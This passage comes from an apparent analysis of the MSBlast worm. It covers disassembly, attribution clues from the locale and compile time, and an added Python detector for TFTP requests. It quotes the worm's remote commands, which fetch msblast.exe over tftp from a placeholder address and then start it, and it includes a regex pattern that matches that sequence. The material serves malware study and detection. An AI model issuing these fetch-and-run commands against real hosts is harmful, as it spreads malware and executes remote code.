:00401DFA  E8F5030000  Call 004021F4  ; WS2_32.closesocket
:00401DFF  833D3840400000  cmp dword ptr [00404038], 00000000
:00401E06  741F  je 00401E27
:00401E08  6A00  push 00000000
:00401E0A  FFB5C0EDFFFF  push dword ptr [ebp+FFFFEDC0]
:00401E10  E853050000  Call 00402368  ; KERNEL32.TerminateThread
:00401E15  FF3524314000  push dword ptr [00403124]
:00401E1B  E8D4030000  Call 004021F4  ; WS2_32.closesocket
:00401E20  83253840400000  and dword ptr [00404038], 00000000
:00401E27  83BDC0EDFFFF00  cmp dword ptr [ebp+FFFFEDC0], 00000000
:00401E2E  740B  je 00401E3B
:00401E30  FFB5C0EDFFFF  push dword ptr [ebp+FFFFEDC0]
:00401E36  E8F1040000  Call 0040232C  ; KERNEL32.CloseHandle
:00401E3B  5F  pop edi
:00401E3C  5E  pop esi
:00401E3D  5B  pop ebx
:00401E3E  C9  leave
:00401E3F  C3  ret
; After connecting to the remote host it sends these commands:
; tftp -i xxx.xxx.xxx.xxx GET msblast.exe
; start msblast.exe
; msblast.exe
; It is unclear why msblast.exe is run twice.
; A file downloaded by tftp is read-only by default.
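A detection example for the two halves of the transfer stage, the UDP/69 server above and the command sequence just listed, added here and not code from the original post. The first part parses a TFTP request datagram in the RFC 1350 layout (2-byte opcode, NUL-terminated filename, NUL-terminated mode), which is what the server's recvfrom receives; the second part scans shell-session text for a `tftp -i <ip> GET <file>` followed by `start <file>`, the pattern the listing sends. The datagrams and session lines are constructed samples; the IP in them is made up, and all function names are mine.

```python
import re
import struct

# Constructed TFTP datagrams (not captures).
RRQ_SAMPLE = b"\x00\x01" + b"msblast.exe\x00" + b"octet\x00"   # read request
RRQ_OTHER = b"\x00\x01" + b"boot.ini\x00" + b"netascii\x00"    # any name works
DATA_SAMPLE = b"\x00\x03\x00\x01" + b"MZ\x90\x00"              # DATA block 1

# Constructed shell-session lines in the order the listing sends them.
SHELL_SAMPLE = [
    "tftp -i 10.1.77.5 GET msblast.exe",
    "start msblast.exe",
    "msblast.exe",
]


def parse_tftp_request(dgram):
    """Parse an RRQ (opcode 1) or WRQ (opcode 2); None for anything else."""
    if len(dgram) < 4:
        return None
    opcode = struct.unpack("!H", dgram[:2])[0]
    if opcode not in (1, 2):
        return None
    # filename NUL mode NUL -> three fields, the last one empty
    fields = dgram[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0]:
        return None
    return {"opcode": "RRQ" if opcode == 1 else "WRQ",
            "filename": fields[0].decode("ascii", "replace"),
            "mode": fields[1].decode("ascii", "replace").lower()}


CMD_PATTERNS = [
    ("tftp_get", re.compile(
        r"^\s*tftp\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})\s+GET\s+(\S+)", re.I)),
    ("start", re.compile(r"^\s*start\s+(\S+)", re.I)),
]


def classify_shell_line(line):
    """Return ('tftp_get', ip, file), ('start', file) or None."""
    for name, rx in CMD_PATTERNS:
        m = rx.match(line)
        if m:
            return (name,) + m.groups()
    return None


def find_tftp_fetch_and_run(lines):
    """True when a file fetched by 'tftp -i ... GET' is later launched with 'start'."""
    fetched = set()
    for line in lines:
        c = classify_shell_line(line)
        if not c:
            continue
        if c[0] == "tftp_get":
            fetched.add(c[2].lower())
        elif c[0] == "start" and c[1].lower() in fetched:
            return True
    return False


if __name__ == "__main__":
    print(parse_tftp_request(RRQ_SAMPLE))
    print(find_tftp_fetch_and_run(SHELL_SAMPLE))
```

The requested filename is not a useful signal on its own, since the server hands out the worm regardless of it; an inbound RRQ to a host that is not a TFTP server, paired with the fetch-then-start sequence in session text, is the combination worth alerting on.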

From the LCID parameter 409 passed to GetDateFormat, the author's operating system was set to the US locale.

The file's compile timestamp is 11 August 2003, 07:21. The earliest capture on the honeypot was 11 August 2003, 14:03 Beijing time.
If the author is in the same time zone as we are, the worm reached the honeypot 6 hours later. If not, the author's location should be no more than 6 time zones west of us.
